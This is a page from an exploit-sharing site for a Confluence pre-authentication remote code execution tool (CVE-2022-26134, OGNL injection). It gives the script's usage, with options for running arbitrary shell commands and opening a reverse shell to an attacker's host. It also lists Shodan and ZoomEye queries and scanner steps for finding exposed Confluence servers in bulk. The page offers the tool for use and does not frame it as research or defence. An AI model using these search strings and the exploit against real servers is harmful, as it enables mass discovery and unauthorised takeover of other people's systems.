Share
## https://sploitus.com/exploit?id=464D6B41-AE5F-5E93-BD26-6E6C8E9F80BC
# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution via OGNL Injection
## UsagE
```bash
usage: exploit.py [-h] [-f FILE] [-c CMD] [-p LPORT] [-l LHOST] [-u URL] [-o OUTPUT]
options:
-h, --help show this help message and exit
-f FILE, --file FILE example.txt
-c CMD, --cmd CMD Shell command
-p LPORT, --lport LPORT
Local port for reverse shell
-l LHOST, --lhost LHOST
Local host for reverse shell
-u URL, --url URL Base target uri (ex. http://target-uri/)
-o OUTPUT, --output OUTPUT
```
Scanner
1. Change the API key in shodan-query.py
2. Run shodan-query.py to grab results (You can change the query in the file)
3. Run check.py to check if Confluence Pre-Auth Remote Code Execution are vulnerable to OGNL Injection
## Shodan Dorks
```bash
shodan search 'http.favicon.hash:-305179312' --fields ip_str,port --limit 500 --separator ":" | sed 's/.$//'
shodan search 'http.component:"atlassian confluence"' --fields ip_str,port --limit 500 --separator ":" | sed 's/.$//'
shodan search 'http.title:"Log In - Confluence" 200' --fields ip_str,port --limit 500 --separator ":" | sed 's/.$//'
shodan search 'http.component:"atlassian confluence" http.title:"Log In - Confluence" 200' --fields ip_str,port --limit 500 --separator ":" | sed 's/.$//'
shodan search 'http.component:"atlassian confluence"' --fields ip_str,port --limit 500 --separator ":" | sed 's/.$//'
shodan search 'http.favicon.hash:-305179312 200' --fields ip_str,port --limit 500 --separator ":" | sed 's/.$//'
```
## Zoomeye Dorks
```bash
zoomeye search 'iconhash:-305179312' -num 800 -filter=ip,port
zoomeye search 'app:"atlassian confluence"' -num 800 -filter=ip,port
zoomeye search 'title:"Log In -Confluence"' -num 800 -filter=ip,port
```